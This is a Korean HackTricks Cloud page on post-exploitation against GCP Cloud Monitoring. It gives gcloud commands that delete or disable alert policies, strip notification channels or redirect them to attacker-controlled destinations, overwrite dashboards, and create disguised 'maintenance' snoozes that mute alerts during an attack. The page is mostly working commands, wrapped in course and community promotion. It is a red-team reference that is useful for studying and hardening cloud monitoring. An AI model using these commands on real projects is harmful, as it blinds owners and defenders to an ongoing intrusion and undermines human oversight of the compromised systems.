GCP - Monitoring Post Exploitation

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.

모니터링

자세한 정보는 다음을 확인하세요:

GCP - Monitoring Enum

로그를 교란하는 다른 방법은 다음을 확인하세요:

GCP - Logging Post Exploitation

`monitoring.alertPolicies.delete`

알림 정책 삭제:

알림 정책 삭제

```bash gcloud alpha monitoring policies delete ```

`monitoring.alertPolicies.update`

알림 정책 교란:

알림 정책 교란

```bash # Disable policy gcloud alpha monitoring policies update --no-enabled

Remove all notification channels

gcloud alpha monitoring policies update –clear-notification-channels

Chnage notification channels

gcloud alpha monitoring policies update –set-notification-channels=ATTACKER_CONTROLLED_CHANNEL

Modify alert conditions

gcloud alpha monitoring policies update –policy=“{ ‘displayName’: ‘New Policy Name’, ‘conditions’: [ … ], ‘combiner’: ‘AND’, … }”

or use –policy-from-file

</details>

### `monitoring.dashboards.update`

대시보드를 수정해 작동을 방해합니다:

<details>

<summary>대시보드 방해</summary>
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
displayName: New Dashboard with New Display Name
etag: 40d1040034db4e5a9dee931ec1b12c0d
gridLayout:
widgets:
- text:
content: Hello World
'''

`monitoring.dashboards.delete`

대시보드 삭제:

대시보드 삭제

```bash # Delete dashboard gcloud monitoring dashboards delete ```

`monitoring.snoozes.create`

snoozer를 생성하여 정책이 경고를 생성하지 못하게 합니다:

경고를 중지하기 위한 snoozer 생성

```bash # Stop alerts by creating a snoozer gcloud monitoring snoozes create --display-name="Maintenance Week" \ --criteria-policies="projects/my-project/alertPolicies/12345,projects/my-project/alertPolicies/23451" \ --start-time="2023-03-01T03:00:00.0-0500" \ --end-time="2023-03-07T23:59:59.5-0500" ```

`monitoring.snoozes.update`

공격자가 관심을 가지는 시점에 경고가 생성되지 않도록 snoozer의 타이밍을 업데이트합니다:

snoozer 타이밍 업데이트

```bash # Modify the timing of a snooze gcloud monitoring snoozes update --start-time=START_TIME --end-time=END_TIME

odify everything, including affected policies

gcloud monitoring snoozes update –snooze-from-file=

</details>

### `monitoring.notificationChannels.delete`

구성된 채널 삭제:

<details>

<summary>알림 채널 삭제</summary>
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>

`monitoring.notificationChannels.update`

채널의 레이블을 수정하여 방해할 수 있습니다:

알림 채널 레이블 수정

```bash # Delete or update labels, for example email channels have the email indicated here gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com ```

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

구독 계획 확인하기!

**💬 Discord 그룹 또는 텔레그램 그룹에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.

HackTricks 및 HackTricks Cloud 깃허브 리포지토리에 PR을 제출하여 해킹 트릭을 공유하세요.